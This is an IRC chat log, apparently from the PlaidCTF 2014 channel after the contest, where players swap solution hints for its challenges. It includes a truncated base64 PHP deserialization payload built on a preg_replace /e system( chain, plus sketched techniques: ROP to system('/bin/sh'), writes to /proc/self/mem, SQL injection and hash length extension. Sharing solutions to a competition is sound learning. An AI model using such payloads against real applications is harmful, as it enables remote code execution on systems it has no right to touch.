  10354. (16:07:53) ••• jOin: (shabgrd) (~mostafa@unaffiliated/shabgard)
  10355. (16:07:55) (@mserrano) tiffany was my favorite
  10356. (16:07:56) (iago-x86) awesie: That's awesome! Make sure you cc: shmoocon :)
  10357. (16:07:57) (choppers) dkohlbre: if you name your pokemon /bin/sh you get system("/bin/sh")
  10358. (16:08:01) ([CISSP]HoLyVieR) tomcr00se: What SQLi did you use for WhatApp, the only table I could leak with 64 caracters was comments ?
  10359. (16:08:02) (tomcr00se) awesie: harry_potter after you have rop?
  10360. (16:08:09) (keidii) anyone solve BBOS here ??
  10361. (16:08:10) (Ymgve) KT: server lies, nonce is used repeatedly, so hash extension
  10362. (16:08:10) (+tylerni7) <3 awesie and cai_ for making the site work
  10363. (16:08:12) (zoku) mserrano: tiffany was fucked
  10364. (16:08:14) (zoku) mserrano: did you write that too?
  10365. (16:08:17) (@mserrano) yes
  10366. (16:08:18) (tomcr00se) [CISSP]HoLyVieR: i guessed (select * from flag) :P
  10367. (16:08:18) (okami41) mserrano: tiffany was a lot of fun, it took me forever though!
  10368. (16:08:22) (ryan-c) https://gist.github.com/anonymous/10602398#file-pctf2014-rsa450 < rsa writeup
  10369. (16:08:22) ([int3]romansoft) <sven> heh, zfs was fun. aDR4eA solved that one in ~10 minutes :D -> wtf!!! How did you find key.xor_encrypted amd xor_key contents? Offsets of them?
  10370. (16:08:23) (wtbw) mserrano: well I said "what about 'breakfast at tiffany's'?"
  10371. (16:08:25) (mak`) what was correct solution to zfs?
  10372. (16:08:26) (+awesie) tomcr00se: you should've been able to just use system(...) to run commands
  10373. (16:08:28) (ryan-c) tylerni7: ^^^
  10374. (16:08:30) ••• jOin: (bs`) (~bs@gateway/tor-sasl/bs/x-48276796)
  10375. (16:08:31) (Ymgve) keidii: SHA1 hashes of device password in nvram
  10376. (16:08:31) (okami41) i kept wanting to set breakpoints
  10377. (16:08:35) (mak`) without brute?
  10378. (16:08:39) (@mserrano) I wrote ezhp, tiffany, mtpox, kpop, hudak, moscow, wheee, twenty, mult. is hard
  10379. (16:08:40) (keidii) Ymgve , och
  10380. (16:08:40) (spq) hy, thanks for the nice ctf
  10381. (16:08:41) ([CISSP]HoLyVieR) tomcr00se: oh wow ... :/
  10382. (16:08:41) (tomcr00se) awesie: but how to find libc?
  10383. (16:08:42) (dkohlbre) choppers: yeah I had that, godammit I was so tired and looking for a write, somehow ignored I was writing a function pointer that i knew
  10384. (16:08:50) (upb) grrrrr wtf
  10385. (16:08:51) (bool101) wow mserrano nice
  10386. (16:08:52) (dkohlbre) choppers: ah well ty
  10387. (16:08:54) (+awesie) tomcr00se: you could leak libc address
  10388. (16:09:05) (tomcr00se) before socket shutdown?
  10389. (16:09:07) (iago-x86) mserrano: I solvee ezhp, mtpox, and kpop :)
  10390. (16:09:17) (ryan-c) tomcr00se: did you write an attack for rsa from scratch or use the c poc by the people that wrote that paper?
  10391. (16:09:19) (tomcr00se) i could either leak libc address OR use libc address
  10392. (16:09:21) (Ymgve) mserrano: was there some agreement to use city names for VM tasks? :)
  10393. (16:09:22) (bool101) liked that problem awesie
  10394. (16:09:25) (+awesie) tomcr00se: don't shutdown the socket, you could get the argument to new() to be -1
  10395. (16:09:27) (rray) iago-x86: how did you solve kpop? wob was too hard
  10396. (16:09:27) (tomcr00se) ryan-c: lol poc of course
  10397. (16:09:28) ••• qUit: (kris) ([email protected]) Ping timeout: 258 seconds
  10398. (16:09:28) ••• qUit: (Rinko) (3d812a67@gateway/web/cgi-irc/kiwiirc.com/ip.61.129.42.103) Client Quit
  10399. (16:09:31) (zoku) iago-x86: what was your ezhp solution?
  10400. (16:09:32) (@mserrano) Ymgve: I named both of them :P
  10401. (16:09:33) (foundation) do you guys know who runs chandler tor node ?
  10402. (16:09:38) (+awesie) tomcr00se: if you have a string of the form: AAAA...PASSWORD
  10403. (16:09:42) (Ymgve) paris was nasty
  10404. (16:09:45) (+houqp_) foundation: yeah
  10405. (16:09:49) (abuss) How did nightmare work? I did try read/write to /proc/self/mem but it gave me i/o error
  10406. (16:09:50) (@mserrano) paris was a great problem
  10407. (16:09:50) (iago-x86) rray: kpop = take advantage of preg_replace()'s /e extension
  10408. (16:09:51) (foundation) he's gonna be scraching his head over this weekend i guess :)
  10409. (16:09:56) ••• jOin: (eZpl0it) ([email protected])
  10410. (16:09:57) ••• qUit: (ccmndhd) ([email protected]) Quit: Verlassend
  10411. (16:09:58) (tomcr00se) awesie: ahh, i missed that, and new will throw
  10412. (16:09:59) (+houqp_) foundation: we contacted the operator before hand :)
  10413. (16:10:03) (+awesie) tomcr00se: yep
  10414. (16:10:08) (wtbw) I really liked that Paris was "clean", other than SEH usage
  10415. (16:10:10) (foundation) houqp_: cool
  10416. (16:10:11) (wtbw) no bs, just complication
  10417. (16:10:11) (+awesie) w/in 7
  10418. (16:10:12) (blagh) how did mtpox work? I never managed to pull it off
  10419. (16:10:13) (+awesie) ugh
  10420. (16:10:14) (rray) iago-x86: i was trying to exploit that at one point, but i couldn't control what went into preg_replace
  10421. (16:10:16) (iago-x86) zoku: It was basically owning a linked list, I think?
  10422. (16:10:18) (rray) i guess i'll wait for the writeup
  10423. (16:10:19) (spq) abuss: i made it with python bytecode to x86 shellcode
  10424. (16:10:23) (+houqp_) foundation: they were very happy with that :)
  10425. (16:10:23) (@mserrano) blagh: hash extension -> sql injection
  10426. (16:10:24) (ryan-c) tomcr00se: it took a while for me to think to look for a poc, people who write papers rarely release code
  10427. (16:10:25) ••• qUit: (shabgard) (~mostafa@unaffiliated/shabgard) Ping timeout: 245 seconds
  10428. (16:10:29) (iago-x86) rray: You can control it via deserializing $_COOKIE['lyrics']
  10429. (16:10:35) (rray) 0_0
  10430. (16:10:41) (KT) <Ymgve>: but you dont know the highest 28 bits of the hash, so how do you extend it?
  10431. (16:10:44) ••• jOin: (jn__) ([email protected])
  10432. (16:10:44) (@mserrano) rray: look up stefan esser's slides on POP chains
  10433. (16:10:47) (Ymgve) KT: brute force
  10434. (16:10:49) ••• qUit: (criple_ripper) ([email protected]) Quit: KVIrc 4.2.0 Equilibrium http://www.kvirc.net/
  10435. (16:10:51) (ryan-c) anyone else here get parlor?
  10436. (16:10:52) (rray) ... i did that, but i did it wrong haha
  10437. (16:10:57) ••• jOin: (nofiki) ([email protected])
  10438. (16:10:58) (iago-x86) Haha
  10439. (16:10:59) ••• qUit: (ronbarrey) ([email protected]) Quit: Leaving
  10440. (16:11:05) (iago-x86) I actually used a whiteboard to draw the object structure
  10441. (16:11:06) (KT) Ymgve: ok, true, nice :D
  10442. (16:11:07) (iago-x86) Good times
  10443. (16:11:09) ••• qUit: (kmkz) ([email protected]) Quit: 'me tire moi !
  10444. (16:11:09) • iago-x86 signs off
  10445. (16:11:11) (Ymgve) KT: do two guesses in sequence then use brute force locally to find the remaining bits
  10446. (16:11:15) (iago-x86) (metaphorically)
  10447. (16:11:15) (@mserrano) Tzo2OiJMeXJpY3MiOjI6e3M6OToiACoAbHlyaWNzIjtzOjQ6ImFzZGYiO3M6NzoiACoAc29uZyI7Tzo0OiJTb25nIjo0OntzOjk6IgAqAGxvZ2dlciI7Tzo2OiJMb2dnZXIiOjE6e3M6MTI6IgAqAGxvZ3dyaXRlciI7TzoxNDoiTG9nV3JpdGVyX0ZpbGUiOjI6e3M6MTE6IgAqAGZpbGVuYW1lIjtzOjg6InNvbWVzaGl0IjtzOjk6IgAqAGZvcm1hdCI7TzoxMzoiTG9nRmlsZUZvcm1hdCI6Mjp7czoxMDoiACoAZmlsdGVycyI7YToxOntpOjA7TzoxMjoiT3V0cHV0RmlsdGVyIjoyOntzOjE1OiIAKgBtYXRjaFBhdHRlcm4iO3M6NzoiLyguKikvZSI7czoxNDoiACoAcmVwbGFjZW1lbnQiO3M6MzU6InN5c3RlbSg
  10448. (16:11:16) (rray) mserrano: i was looking at the article he wrote, in retrospect i was actually quite close :P
  10449. (16:11:17) (abuss) spq, nice, got a writeup? I tried to build bytecode that would call os.system but I couldn't get import to work
  10450. (16:11:22) (@mserrano) importing that
  10451. (16:11:24) (@mserrano) oh shit that got truncated
  10452. (16:11:25) (@mserrano) oh well
  10453. (16:11:27) (@mserrano) would get flag
  10454. (16:11:33) ••• qUit: (corewar) ([email protected]) Quit: Lost terminal
  10455. (16:11:34) (whois) who know bbos ?
  10456. (16:11:37) (deject3d_) where writeups
  10457. (16:11:39) (foundation) was there an easy way of solving g++ , those c++ templates ?
  10458. (16:11:40) ••• qUit: (ganapati) ([email protected]) Quit: Quitte
  10459. (16:11:42) (abuss) ryan-c, curious how? I spent an hour or so on that but couldn't find any way to predict output
  10460. (16:11:46) ••• qUit: (oceanx) ([email protected]) Ping timeout: 258 seconds
  10461. (16:11:46) (@mserrano) http://paste2.org/Nn46z87k <- import this on kpop, obtain flag
  10462. (16:11:47) (zoku) iago-x86: yea, had to overflow one buffer to write to the linked list
  10463. (16:11:47) (spq) abuss: i'll see
  10464. (16:11:47) (Ymgve) whois: SHA1 hashes of device password in nvram
  10465. (16:11:47) (abuss) it wasn't a lcg as far as I could tell
  10466. (16:11:49) (tomcr00se) foundation: dynamically
  10467. (16:11:52) (comex) foundation: i tried z3 but it didn't work :p
  10468. (16:11:58) (ryan-c) abuss: hash length extension attack
  10469. (16:12:00) (blagh) mserrano: Well, I was going down a completely wrong path
  10470. (16:12:10) (whois) Ymgve // Thx, !
  10471. (16:12:10) (abuss) god dammit I really need to figure out how those work
  10472. (16:12:11) (abuss) haha
  10473. (16:12:12) (ryan-c) abuss: you can get the last 100 bits of the md5
  10474. (16:12:19) (yyyyyyy) sooooo..... guys.... anyone solved the almost-feistel cipher?
  10475. (16:12:19) (ryan-c) abuss: extend it blind
  10476. (16:12:19) (zardus) great ctf, guys
  10477. (16:12:20) ••• jOin: (Dumpling) ([email protected])
  10478. (16:12:21) (marcoscars02) ryan-c, awesome write
  10479. (16:12:24) (@mserrano) yyyyyyy: :)
  10480. (16:12:27) (+tylerni7) btw, who solved RSA? curious how you did it?
  10481. (16:12:28) (@mserrano) yyyyyyy: Slide attack
  10482. (16:12:31) (NK_) never saw a ctftime update as quickly
  10483. (16:12:32) (NK_) :)
  10484. (16:12:32) (foundation) tomcr00se: dynamically ? i tried to mess with recursion depth , to figure out something ...
  10485. (16:12:33) (+tylerni7) apparently there was code posted :(
  10486. (16:12:34) (zardus) my favorite was harry potter :-)
  10487. (16:12:35) ([int3]romansoft) please, offsets of key.xor_encrypted and xor_key (zfs)???
  10488. (16:12:37) ••• qUit: (nofiki) ([email protected]) Client Quit
  10489. (16:12:38) (@mserrano) yyyyyyy: you can reverse a single double-round in <= 4096 iterations
  10490. (16:12:39) (+tylerni7) I wanted people to solve themselves
  10491. (16:12:42) (tomcr00se) tylerni7: the code from the paper
  10492. (16:12:43) (ryan-c) abuss: and brute force the other 28 bits to find something that resulted in a matching second hash
  10493. (16:12:44) (abuss) tylerni7, kmowery
  10494. (16:12:48) (+tylerni7) tomcr00se: damn
  10495. (16:12:50) (@mserrano) yyyyyyy: and then using ~512 plaintexts you can reliably get a slid pair
  10496. (16:12:53) (+tylerni7) tomcr00se: I didn't know about the code D:
  10497. (16:12:58) (+tylerni7) someone else linked me to it
  10498. (16:12:59) (abuss) nice okay
  10499. (16:13:04) (ryan-c) marcoscars02: It's a quick shitty writeup, lol will make a better one later
  10500. (16:13:07) (tomcr00se) tylerni7: wait you really wrote that attack?
  10501. (16:13:08) (fuzyll) tylerni7: tomcr00se: what paper?
  10502. (16:13:11) (@mserrano) tomcr00se: yeah, he did
  10503. (16:13:16) (+tylerni7) tomcr00se: yeah I have it in python
  10504. (16:13:17) (@mserrano) it's pretty cool
  10505. (16:13:18) (marcoscars02) awesome code ryan-c
  10506. (16:13:20) (marcoscars02) :O
  10507. (16:13:23) ••• qUit: (Otacon22) ([email protected]) Ping timeout: 240 seconds
  10508. (16:13:28) (sven) i think segher wrote his own code too after reading the paper
  10509. (16:13:29) (ryan-c) fuzyll: http://cseweb.ucsd.edu/~hovav/papers/hs09.html
  10510. (16:13:29) (geobot) yeah ucsd revealed themselves
  10511. (16:13:35) (+tylerni7) sven: :) good
  10512. (16:13:40) (sven) not sure though :)
  10513. (16:13:42) (+tylerni7) geobot: yes.. they did
  10514. (16:13:43) (@mserrano) sven: how did DS get wheee?
  10515. (16:13:45) (+tylerni7) o.0
  10516. (16:13:48) (yyyyyyy) mserrano, I actually didn't know that attack... :/ thanks for explaining
  10517. (16:13:50) (@mserrano) sven: did you guys actually do the 26**3 requests?
  10518. (16:13:55) (ryan-c) I got part way through writing my own code from the paper too
  10519. (16:13:58) ••• jOin: (irctc736) (806f3006@gateway/web/freenode/ip.128.111.48.6)
  10520. (16:14:10) (abuss) tylerni7, the best part is that our crypto guy didn't see that link
  10521. (16:14:14) (tomcr00se) what was the wheee solution?
  10522. (16:14:15) ••• qUit: (bs`) (~bs@gateway/tor-sasl/bs/x-48276796) Remote host closed the connection
  10523. (16:14:18) (abuss) and spent quite a while writing from scratch
  10524. (16:14:20) (mak`) zfs anyone? ;]
  10525. (16:14:21) (@mserrano) tomcr00se: http://www.theamazingking.com/crypto-slide.php
  10526. (16:14:26) (abuss) and then noticed it after submitting flag :P
  10527. (16:14:31) ••• qUit: (Im11Plus1) ([email protected]) Remote host closed the connection
  10528. (16:14:31) (dkohlbre) tylerni7: the best part is that he IS HOVAV'S GRAD STUDENT
  10529. (16:14:35) (abuss) ^^^^
  10530. (16:14:36) (sven) mserrano: uh.. i know that someone implemented the slide attack, dunno how many requests we sent though
  10531. (16:14:39) ••• jOin: (bs`) (~bs@gateway/tor-sasl/bs/x-48276796)
  10532. (16:14:42) (@mserrano) sven: ah cool
  10533. (16:14:42) ••• qUit: (deject3d_) ([email protected]) Quit: Computer has gone to sleep.
  10534. (16:14:51) (@mserrano) someone was gonna do 26**3 blocks
  10535. (16:14:55) (sven) :D
  10536. (16:14:59) (ryan-c) abuss: he wrote a solver from the paper then found the source?
  10537. (16:15:02) (@mserrano) but you can do it in < 512; I got it with 256
  10538. (16:15:05) (+tylerni7) dkohlbre: haha whatt
  10539. (16:15:07) (@mserrano) (aka a single request)
  10540. (16:15:13) (tomcr00se) grr, yea, i figured it was something like this, but i was too tired this morning
  10541. (16:15:17) (whois) whats tor(rendezvous) prob?
  10542. (16:15:18) (+tylerni7) that's geat
  10543. (16:15:27) (sssssssss) how to solve halphow2js?
  10544. (16:15:28) (dkohlbre) tylerni7: yeah, he grabbed the paper, wrote a new impl, and THEN noticed the impl by hovav
  10545. (16:15:33) (@mserrano) dkohlbre: LOL
  10546. (16:15:34) (+tylerni7) dkohlbre: that makes me so happy
  10547. (16:15:37) ••• pArt: (Rexperience7) (~Rex@unaffiliated/rexperience7)
  10548. (16:15:43) (dkohlbre) sooo now we have 2
  10549. (16:15:45) (clockish) :D
  10550. (16:15:46) (+tylerni7) lol
  10551. (16:15:52) (asmoday) HEY whats the next CTF
  10552. (16:15:54) (mathiasbynens) halphow2js write-up https://github.com/ctfs/write-ups/tree/master/plaid-ctf-2014/halphow2js
  10553. (16:15:56) (whois) using chandler router to connect onion ?
  10554. (16:15:59) (marcoscars02) asmoday, sqli
  10555. (16:15:59) (+tylerni7) asmoday: ctftime.org
  10556. (16:16:00) (marcoscars02) xD
  10557. (16:16:11) (asmoday) so that site is up to date
  10558. (16:16:17) (mathiasbynens) heartbleed write-up: https://github.com/ctfs/write-ups/tree/master/plaid-ctf-2014/heartbleed
  10559. (16:16:18) (+tylerni7) yeah
  10560. (16:16:19) (Ymgve) How do you specify a router to use as a rendezvous point?
  10561. (16:16:22) (wtbw) thanks again guys :)
  10562. (16:16:28) (foundation) whois: yes, you had to patch the tor source to make sure it uses chandler as rendezvous point
  10563. (16:16:29) (ryan-c) whois: you have to modify tor in a couple places - first to handle an unencryped list of intro points, then to force using chandler as a rend point, then to include beef in the rend cookie
  10564. (16:16:39) (mathiasbynens) multiplication is hard write-up: https://github.com/ctfs/write-ups/tree/master/plaid-ctf-2014/multiplication-is-hard
  10565. (16:16:42) (ryan-c) Ymgve: you have to modify the tor source code
  10566. (16:16:50) (asmoday) multiplication is hard, oh the memories
  10567. (16:16:51) (foundation) Ymgve: source patching
  10568. (16:16:51) (Ymgve) ryan-c: was afraid of that
  10569. (16:16:51) (whois) oh ,,
  10570. (16:16:55) ••• qUit: (wtbw) (~wtbw@unaffiliated/wtbw)
  10571. (16:16:57) (jix) ryan-c: unencrypted list of intro points?
  10572. (16:16:59) (ryan-c) it was a pain in the arse
  10573. (16:17:00) (jix) ryan-c: I didn't have to do that
  10574. (16:17:05) ••• qUit: (oceanx_) ([email protected]) Ping timeout: 276 seconds
  10575. (16:17:06) (pipecork) mathiasbynens: lol
  10576. (16:17:07) (ryan-c) jix: hm
  10577. (16:17:10) (jix) only chandler as rend point and beef as cookie
  10578. (16:17:14) (mathiasbynens) pipecork: the real tough ones :')
  10579. (16:17:15) (jix) but it was painful
  10580. (16:17:15) (mathiasbynens) please add links to your write-ups here https://github.com/ctfs/write-ups/tree/master/plaid-ctf-2014
  10581. (16:17:24) (jix) especially chandler as rend point
  10582. (16:17:31) (abuss) oh my god that jshalp
  10583. (16:17:35) (abuss) 0.0
  10584. (16:17:45) ••• pArt: (stach) ([email protected])
  10585. (16:17:54) (tomcr00se) i loved jshalp
  10586. (16:17:54) (dkohlbre) ok time to go home, ty ppp
  10587. (16:17:58) (sven) freya annoyed me the most. especially 'cause all i did was recompile openssh in the end to make it work :<
  10588. (16:18:03) (+awesie) dkohlbre: thanks for playing :)
  10589. (16:18:08) (sdjakl) re wheeeee, i wrote the slide attack. we used 256 blocks
  10590. (16:18:21) (sdjakl) (for whoever was asking sven)
  10591. (16:18:23) (mathiasbynens) tomcr00se: did you solve it the same way? https://github.com/ctfs/write-ups/tree/master/plaid-ctf-2014/halphow2js#readme
  10592. (16:18:27) (clockish) abuss: do you know how to js
  10593. (16:18:28) (abuss) clockish, so what did mystop do? I spent HOURS trying to reverse and black box it
  10594. (16:18:29) (sven) mserrano: ^--
  10595. (16:18:32) (ryan-c) anyone do a writeup of curlcore?
  10596. (16:18:33) (abuss) clockish, LOLNO
  10597. (16:18:38) (clockish) abuss: i don't either
  10598. (16:18:41) ••• qUit: (eZpl0it) ([email protected]) Ping timeout: 252 seconds
  10599. (16:18:42) (abuss) it was like the collatz function
  10600. (16:18:45) (abuss) but with an exception
  10601. (16:18:45) (@mserrano) tomcr00se: anyone else wondering: https://gist.github.com/mserrano/54465a80ffe75739d2ee
  10602. (16:18:47) (abuss) that had an exception
  10603. (16:18:50) (+tylerni7) ryan-c: use something to search for aes key schedule
  10604. (16:18:54) (@mserrano) sven: sdjakl: cool
  10605. (16:18:54) (mathiasbynens) clockish, abuss: https://github.com/ctfs/write-ups/tree/master/plaid-ctf-2014/halphow2js#readme
  10606. (16:18:55) (+tylerni7) then cbc
  10607. (16:18:56) (+tylerni7) :P
  10608. (16:19:01) (ryan-c) tylerni7: goddamnit
  10609. (16:19:02) (ryan-c) really?
  10610. (16:19:03) (clockish) abuss: yeah, exactly. I just modified the collatz function with some shit
  10611. (16:19:10) (ryan-c) I threw aeskeyfind at it first thing
  10612. (16:19:13) (@mserrano) (that gist uses 512 blocks, but you can use 256 and it will work with very high probability)
  10613. (16:19:14) (ryan-c) and got an aes key
  10614. (16:19:14) (geobot) ah, thought it will win 8 to search for aes key schedule
  10615. (16:19:23) (@mserrano) (csol is just a C implementation of the cipher)
  10616. (16:19:25) (+tylerni7) ryan-c: yeah, aeskeyfind may not work, but some tools do
  10617. (16:19:37) (tomcr00se) too tired to even read that :P
  10618. (16:19:45) (marcoscars02) steg writeup?
  10619. (16:19:46) (marcoscars02) :DD
  10620. (16:19:50) (Pitr_) why was the memory layout in curlcores dump different from gnutls_int.h ?
  10621. (16:19:53) (clockish) mathiasbynens: yeah, good write up, that's basically the intended solution :)
  10622. (16:19:57) (sdjakl) a
  10623. (16:19:59) (+tylerni7) marcoscars02: randomize the palette
  10624. (16:20:01) (ryan-c) aeskeyfind gave me 68f946e9c1fd339eec04fc048e651ba7642ee8df2519aaf308ab567f7e4bc231
  10625. (16:20:03) (+tylerni7) then reopen image
  10626. (16:20:07) (+tylerni7) ryan-c: there are 2 keys
  10627. (16:20:07) (ryan-c) next to some asn1 structures
  10628. (16:20:08) (Beched) lol people say that penthackon team cheats like ASSholes asking ppl for hints or flags, pretending they are some poor small team in the bottom of scoreboard. And they post FAKE flags in PM LOL
  10629. (16:20:12) (+tylerni7) one for encrypting, one for decrypting
  10630. (16:20:19) (+tylerni7) (each side of the connection)
  10631. (16:20:19) (_blasty_) LOL Beched
  10632. (16:20:27) (sven) :D
  10633. (16:20:29) (ryan-c) tylerni7: you mean one for server->client and one for client->server?
  10634. (16:20:30) ••• jOin: (Valion) ([email protected])
  10635. (16:20:33) (rray) thx ppp, it was a cool ctf
  10636. (16:20:34) (Ymgve) I think Beched got burned
  10637. (16:20:35) (+tylerni7) ryan-c: yep
  10638. (16:20:39) (arthurdent) tylerni7: how do you randomize the pallete?
  10639. (16:20:40) (@mserrano) rray: :)
  10640. (16:20:46) (Beched) Ymgve: ??
  10641. (16:20:48) (+tylerni7) arthurdent: open it up in something like 010
  10642. (16:20:56) (abuss) yeah, great problems! can't wait until I can do more than 10% of them :P
  10643. (16:21:03) (tomcr00se) mathiasbynens: sort of, i did "+6"
  10644. (16:21:11) (Beched) tomcr00se: the same with penthackon was at olympic
  10645. (16:21:29) (Adran) marcoscars02: Have you played with StegSolver? :)
  10646. (16:21:48) (marcoscars02) zsteg
  10647. (16:21:49) (marcoscars02) :S
  10648. (16:21:51) ••• pArt: (yyyyyyy) ([email protected])
  10649. (16:22:05) ••• qUit: (lkwpeter) ([email protected]) Ping timeout: 245 seconds
  10650. (16:22:06) (marcoscars02) and a lot of brain xDD
  10651. (16:22:08) (sdjakl) l/win 18
  10652. (16:22:11) ••• jOin: (lkwpeter1) ([email protected])
  10653. (16:22:14) (keidii) any ZFS solution other than brute ?
  10654. (16:22:26) ••• jOin: (D3AdCa7_) (d220a27e@gateway/web/freenode/ip.210.32.162.126)
  10655. (16:22:29) (+tylerni7) keidii: yes... but it was a pain
  10656. (16:22:30) (ryan-c) for steg, we just dicked around with setting all colors in the pallet except one to black
  10657. (16:22:30) ••• qUit: (Valion_) ([email protected]) Ping timeout: 245 seconds
  10658. (16:22:41) (ryan-c) and found an interesting range of pallet entries
  10659. (16:22:42) (inter) tylerni7: do you know who made tenement?
  10660. (16:22:45) (mak`) tylerni7: tell me
  10661. (16:22:51) (keidii) tylerni7 , i droped reading zfs src/doc after few hours
  10662. (16:22:52) (+tylerni7) inter: gbarboza
  10663. (16:23:00) (mak`) i spend a lot h on this
  10664. (16:23:03) ••• jOin: (Rexperience7) (~Rex@unaffiliated/rexperience7)
  10665. (16:23:06) ••• qUit: (D3AdCa7) (d220a27e@gateway/web/freenode/ip.210.32.162.126) Ping timeout: 240 seconds
  10666. (16:23:06) ••• qUit: (someone_) (d1cb4e22@gateway/web/freenode/ip.209.203.78.34) Ping timeout: 240 seconds
  10667. (16:23:14) (mak`) and got nothing at the end
  10668. (16:23:18) ••• pArt: (dracu) ([email protected])
  10669. (16:23:23) ••• pArt: (sssssssss) (5a9c5102@gateway/web/freenode/ip.90.156.81.2)
  10670. (16:23:25) (Adran) i just randomized the colors and was able to make out all but the 'keep' part originally
  10671. (16:23:51) (pd7) what tool did you use to randomize the colors?
  10672. (16:23:58) (Adran) stegsolve
  10673. (16:23:59) (mak`) how one can find file if there is no data in dnode table?
  10674. (16:24:04) (pd7) thanks
  10675. (16:24:06) (ciliated) how to solve kpop?
  10676. (16:24:27) (mak`) ciliated: unserialize nad preg_replace
  10677. (16:24:29) (Adran) ciliated: http://paste2.org/Nn46z87k
  10678. (16:24:35) (abuss) anyone got a nightmare writeup?
  10679. (16:24:40) (mathiasbynens) clockish: nice! there must be a better way to find input groups for halphow2js rather than trial and error though
  10680. (16:24:48) (abuss) I heard you were supposed to write to /proc/self/mem but I got i/o err
  10681. (16:24:49) (clockish) abuss: write to /proc/self/mem
  10682. (16:24:52) (clockish) oh
  10683. (16:24:57) ••• qUit: (erketu) ([email protected]) Read error: Connection reset by peer
  10684. (16:24:57) (clockish) you have to write corectly
  10685. (16:25:02) (clockish) like, turn off buffering
  10686. (16:25:08) (abuss) oh hmm
  10687. (16:25:12) ••• jOin: (Rinko) (3d812a67@gateway/web/cgi-irc/kiwiirc.com/ip.61.129.42.103)
  10688. (16:25:28) ••• jOin: (mibbit_19028) (4a780f96@gateway/web/cgi-irc/kiwiirc.com/ip.74.120.15.150)
  10689. (16:25:37) (Ymgve) what was the solution to freya?
  10690. (16:25:54) (mibbit_19028) solution to pwn 100?
  10691. (16:25:56) (clockish) mathiasbynens: heh, not really, just once you realize you can do it with small numbers you just play around
  10692. (16:25:59) (robbje) mak`: same here :>
  10693. (16:26:03) (Pitr_) tyler, what did i miss on curlcore?
  10694. (16:26:03) (inter) mserrano
  10695. (16:26:06) (inter) how did i
  10696. (16:26:08) (inter) misread
  10697. (16:26:08) (ryan-c) tylerni7: How's the reading interface on parlor built? Is it basically dependent on the nonce being in a single packet?
  10698. (16:26:09) (inter) 1 with l
  10699. (16:26:10) (mak`) robbje: you did it?
  10700. (16:26:10) (mathiasbynens) clockish: ok cool, thanks for confirming
  10701. (16:26:13) (inter) i still cant believe it
  10702. (16:26:18) (+tylerni7) ryan-c: dude I dunno
  10703. (16:26:22) (+tylerni7) it's just simple python
  10704. (16:26:27) (+tylerni7) I wrote it as simply as possible :P
  10705. (16:26:27) (robbje) mak`: no :(
  10706. (16:26:29) (foundation) Pitr_: what did you do on curlcore ?
  10707. (16:26:34) (mak`) tylerni7:
  10708. (16:26:38) ••• jOin: (slipper) ([email protected])
  10709. (16:26:38) (Rexperience7) how to solve tenement
  10710. (16:26:41) (@mserrano) inter: :
  10711. (16:26:42) (robbje) i just wasted hours on it
  10712. (16:26:42) (@mserrano) (
  10713. (16:26:43) (ryan-c) tylerni7: You're just doing a socket read?
  10714. (16:26:43) (Pitr_) why was the memory layout in curlcores dump different from gnutls_int.h
  10715. (16:26:47) (robbje) Rexperience7: google egghunter
  10716. (16:26:50) ••• qUit: (lkwpeter1) ([email protected]) Ping timeout: 276 seconds
  10717. (16:26:51) (+tylerni7) ryan-c: yeah
  10718. (16:27:00) (Sin__) Rexperience7, just dump the whole memory and do strings
  10719. (16:27:01) (+gbarboza) Rexperience7: http://www.hick.org/code/skape/papers/egghunt-shellcode.pdf
  10720. (16:27:01) (foundation) i dumped the heap and searched for somethign resembleing the client random , first part you can take from ssl packet
  10721. (16:27:02) (+tylerni7) if it's multiple packets it might get sad (as in it'd just read the first one)
  10722. (16:27:13) (Rexperience7) oh
  10723. (16:27:14) (Rexperience7) EGGHUNTER
  10724. (16:27:15) ([pwn]Idolf) FUCKING HELL
  10725. (16:27:17) (Rexperience7) OHHHHHHH
  10726. (16:27:19) (+dickoff) Streaming question, do people care about the video part of plaidTV or just the music
  10727. (16:27:22) ([pwn]Idolf) We got code exec on the python jail now
  10728. (16:27:26) ([pwn]Idolf) 28 minutes too late
  10729. (16:27:31) (inter) dickoff: you should stream
  10730. (16:27:33) (Pitr_) foundation: i checked the order in the geaderfile
  10731. (16:27:34) (inter) of yo uguys
  10732. (16:27:35) (Sin__) what plaidtv ?
  10733. (16:27:37) ([pwn]Idolf) what was the intended solution?
  10734. (16:27:38) (inter) suffereing from 502 erros
  10735. (16:27:44) (mathiasbynens) [pwn]Idolf: what’s your exploit look like?
  10736. (16:27:45) (ryan-c) tylerni7: yeah, it didn't work when i tried to send stuff through netcat which breaks into packets by line.
  10737. (16:27:45) (mak`) dickoff: both
  10738. (16:27:49) (+ricky) Sin__: It's a video/audio stream dickoff did last year
  10739. (16:27:49) (@mserrano) [pwn]Idolf: use /proc/self/mem to overwrite a function pointer
  10740. (16:28:04) (robbje) mserrano: i think we solved it differently :)
  10741. (16:28:06) (muchacho) mserrano, how do you call "someshit"-file ?
  10742. (16:28:06) (ryan-c) tylerni7: worked when i used python and socket.sent
  10743. (16:28:08) (ryan-c) er
  10744. (16:28:09) (Sin__) like at the defcon quals? that would've been nice
  10745. (16:28:10) (ryan-c) send
  10746. (16:28:19) (+tylerni7) ryan-c: yeah
  10747. (16:28:20) (@mserrano) robbje: did you guys use a code object?
  10748. (16:28:22) (sven) so, i'm curious, how was zfs supposed to be solved?
  10749. (16:28:23) ([pwn]Idolf) mserrano: wtf, can you write using /proc/self/mem?
  10750. (16:28:27) ([pwn]Idolf) We tried that :/
  10751. (16:28:32) (+tylerni7) sven: zfs stuff...
  10752. (16:28:37) (robbje) mserrano: i think so
  10753. (16:28:44) (robbje) the exploit is huge and ugly :>
  10754. (16:28:44) (geobot) its ugly though
  10755. (16:28:48) (abuss) dickoff, did I miss a link to plaidtv?
  10756. (16:28:48) (+tylerni7) sven: frozencemetery and awreece know how
  10757. (16:28:49) (@mserrano) [pwn]Idolf: yeah, you have to set the modes correctly and shit
  10758. (16:28:52) (ryan-c) also fuck debugging endienness issues
  10759. (16:28:54) (abuss) 48 hours ago? :P
  10760. (16:28:55) (@mserrano) robbje: :) that's how clockish did it
  10761. (16:28:55) (+dickoff) abuss: I didn't do it this year
  10762. (16:29:02) (abuss) ah k
  10763. (16:29:07) ([pwn]Idolf) mserrano: ..... open("/proc/self/exe", "w")?
  10764. (16:29:13) ••• qUit: (nUl1) (5d9dadb6@gateway/web/freenode/ip.93.157.173.182) Quit: Page closed
  10765. (16:29:17) (@mserrano) open("/proc/self/maps", "r+b")
  10766. (16:29:18) (clockish) robbje: you used a code object? <3
  10767. (16:29:22) (@mserrano) you also have to set buffering to zero or something
